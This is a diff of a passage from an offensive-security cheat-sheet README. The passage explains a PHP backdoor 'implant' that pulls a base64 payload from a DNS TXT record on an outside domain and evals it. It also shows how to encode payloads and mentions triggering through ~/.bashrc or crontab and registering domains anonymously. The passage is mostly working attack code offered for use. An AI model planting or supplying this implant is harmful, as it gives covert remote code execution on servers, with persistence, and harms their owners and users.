hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 Execute arbitrary commands on a server that is _not_ accessible from the public Internet by using a reverse DNS trigger.

-Add this implant to an index.php file (example):
+Add this line (the implant) at the beginning of any PHP file:
 ```php
 <?PHP eval(base64_decode(dns_get_record("b00m.team-teso.net", DNS_TXT)[0]['txt'])); ?>
 ```

-The payload is stored in a DNS TXT record under the domain `b00m.team-teso.net`.
+The implant requests the payload via a DNS TXT-request from the domain `b00m.team-teso.net`.
 When triggered, it creates `/tmp/.b00m` and notifies THC (via an app.interactsh.com callback). *Please* use your own domain and also create your own payload.
 Example:
 ```shell
 echo -n '@system("{ id; date;}>/tmp/.b00m 2>/dev/null");' |base64 -w0
 ```

-- The TXT payload is limited to 2,048 characters (sometimes 65,535 characters).
+- The DNS TXT payload is limited to 2,048 characters (sometimes 65,535 characters).
-- It is a `bootloader` implant.
+- The implant is a `bootloader`.
 Use a while loop to download and execute larger paypload via DNS.
+- Check out our favorite places to [register a domain anonymously](#pub):

 Can also be triggered via `~/.bashrc` or the user's crontab.
 Use (example):
 ```shell